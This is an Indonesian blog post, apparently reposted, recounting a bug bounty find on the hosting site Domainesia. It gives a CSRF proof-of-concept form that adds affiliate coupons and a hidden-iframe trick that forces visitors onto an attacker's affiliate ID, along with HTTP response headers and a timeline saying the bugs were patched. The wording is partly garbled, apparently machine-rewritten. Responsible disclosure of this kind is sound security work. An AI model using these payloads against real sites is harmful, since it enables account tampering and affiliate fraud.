Perburuan Bug Bounty Di Situs Domainesia Yang Di Lakukan Oleh Eka Syawan ( Radenvodka )
Domainesia.... mungkin anda akan berfikir situs penyedia hosting dan domain murah...
sebenar nya situs-situs besar jarang sekali mempunyai bug sanggup di bilang tepat lah untuk sekelas penyedia hosting dan domain besar ini.
Mas eka syahwan sendiri melaksanakan pencarian bug di situs domainesia alasannya faktor bosan ingin berbuat apa dan yang menjadi materi pelampiasan nya situs domainesia ( gabutan gayn ).ternyata oh ternyata mas eka syahwan ternyata menemukan 2 bug pada situs domainesia.
Bug yang pertama di temukan oleh mas eka syahwan sendiri bug csrf. apa itu csrf ? baca artikel nya di sini
pada bug csrf ini mas eka syahwan sendiri mencoba melaksanakan penambahan kupon affiliasi ternyata berhasil..
Untuk Proof Of Concept ( POC ) :
Untuk lebih terang nya anda sanggup melihat video nya pribadi :
<form action=”https://my.domainesia.com/index.php?m=affcoupons" method=”POST”> <input type=”hidden” name=”token”> <input type=”hidden” name=”cmd” value=”add”> <input type=”hidden” name=”code” value=”xc”> <input type=”hidden” name=”type” value=”UGVyY2VudGFnZUAxQDIwQEAxMDQsMTA1LDEwNiwxMDcsMTA4LDExMiwxMTMsMTE0QEAwQDBAMEAw”> <input type=”submit” name=”Submit” value=”Add+New+Coupon”> </form>
Bug yang kedua di temukan oleh mas eka syahwan ialah bug bypass affiliate
Untuk skenario nya :
https://www.domainesia.com/?aff=5340 jikalau anda mengunakan tautan ini dan di iframe tidak akan berhasil alasannya adanya
x-frame-options: SAMEORIGIN
oleh alasannya itu Attacker menciptakan sebuah iframe dan di taruh di web yang ramai.
<iframe style="display: none" src="https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=**5340**&incorrect=false"></iframe>
5340 merupakan ID affiliate
goto merupakan halaman redirect.
Contoh :
https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto= xxx.php maka akan di ahlikan ke
https://my.domainesia.com/xxx.php?incorrect=true
jadi sanggup di simpulkan jikalau kita masukan https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=5340 &incorrect=false maka akan menjadi https://my.domainesia.com/aff.php?aff=5340
Untuk respons undangan data :
Request URL: https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=5340&incorrect=false
Request Method: GET
Status Code: 302
Remote Address: 139.162.55.180:443
cache-control: max-age=0, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
content-type: text/html; charset=utf-8
date: Sun, 16 Dec 2018 16:59:10 GMT
location: aff.php?aff=5340&incorrect=true
pragma: no-cache
server: nginx
set-cookie: xxxx=xxx; path=/; secure; HttpOnly
set-cookie: xxx=xxxx; path=/; secure; HttpOnly
status: 302
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-page-speed: Deneva
x-xss-protection: 1; mode=block
Untuk lebih terang nya anda sanggup melihat video nya:
Untuk log pelaporan bug yang di lakukan oleh mas eka syahwan anda sanggup melihat nya di bawah ini
17.12.18 : Mengirimkan gosip bug/celah.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug lagi proses perbaikan.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug sudah di patch dan saya suruh melaksanakan pengecekan kembali. dan bug sudah di patch oleh pihak domainesia.
17.12.18 : Reward yang di dapatkan oleh mas eka syahwan ? pengalaman yang sangat berharga sekali bisa
menemukan bug di situs domainesia.
thanks to :
Untuk sedikit info sebenar nya eka syahwan melaksanakan pencarian bug bounty tepat nya pada tanggal 17 desember 2018 terimakasih.
Sumber https://tibalagi.blogspot.com/